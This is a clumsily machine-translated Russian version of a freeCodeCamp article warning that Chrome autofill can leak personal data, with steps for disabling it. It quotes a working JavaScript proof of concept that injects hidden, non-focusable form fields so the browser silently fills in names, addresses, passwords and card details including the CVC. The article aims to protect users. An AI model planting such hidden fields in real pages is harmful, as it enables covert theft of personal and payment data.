Рубрики
Без рубрики

Почему автозаполнение Chrome небезопасно и как вы можете отключить его

Chrome еще предстоит исправить известную уязвимость в первую очередь публикуемый путь назад в 2013 году. В основном хакер может скрыть поля ввода в веб-странице на веб-странице, какой Chrome затем заполнит вашу личную информацию, если вы решите использовать свою функцию автозаполнения. Вот что это выглядит как:

Автор оригинала: FreeCodeCamp Community Member.

Chrome еще не зафиксирован известный уязвимость Первый публикационный путь назад в 2013 году Отказ

В принципе, хакер может скрыть поля ввода в форме на веб-странице, какой Chrome затем заполнит вашу личную информацию, если вы решите использовать свою функцию автозаполнения.

Вот что это выглядит как:

Jithub User Haampie продемонстрировал это со следующим сценарием JavaScript:

var autocompletes = ['name', 'honorific-prefix', 'given-name',  'additional-name', 'family-name', 'honorific-suffix',  'nickname', 'username', 'new-password',  'current-password', 'organization-title', 'organization',  'street-address', 'address-line1', 'address-line2',  'address-line3', 'address-level4', 'address-level3',  'address-level2', 'address-level1', 'country',  'country-name', 'postal-code', 'cc-name', 'cc-given-name',  'cc-additional-name', 'cc-family-name', 'cc-exp',  'cc-exp-month', 'cc-exp-year', 'cc-csc', 'cc-type',  'transaction-currency', 'transaction-amount',  'language', 'bday', 'bday-day', 'bday-month',  'bday-year', 'sex', 'url', 'photo', 'tel',  'tel-country-code', 'tel-national',  'tel-area-code', 'tel-local', 'tel-local-prefix',  'tel-local-suffix', 'tel-extension', 'impp'];emailField.addEventListener('focus', function() {  var wrap = autocompletes.reduce(function(wrapper, field) {    var input = document.createElement('input');        // Make them not focussable    input.tabIndex = -1;    input.autocomplete = field;        wrapper.appendChild(input);    return wrapper;  }, document.createElement('div'));  // Hide the wrapper  wrap.classList.add('hidden');  form.appendChild(wrap);  // Inject the autocompletes once  this.removeEventListener('focus', arguments.callee);});

Я рекомендую вам немедленно отключить функцию автозаполнения Chrome.

Самый быстрый способ отключить автозаполнение в Chrome

  1. Вставьте это в адресную строку Chrome: Chrome://Настройки/Autofill
  2. Нажмите Escape, чтобы выйти из модального модального модала «Управление Autofill»
  3. Снимите флажок Autofill

Теперь вы хотите пойти. Вам, возможно, придется набрать немного больше, но вы можете иметь душевное спокойствие, что хакеры не смогут украсть ваши личные данные, используя этот знаменитый эксплуататор.

Читайте ещё по теме: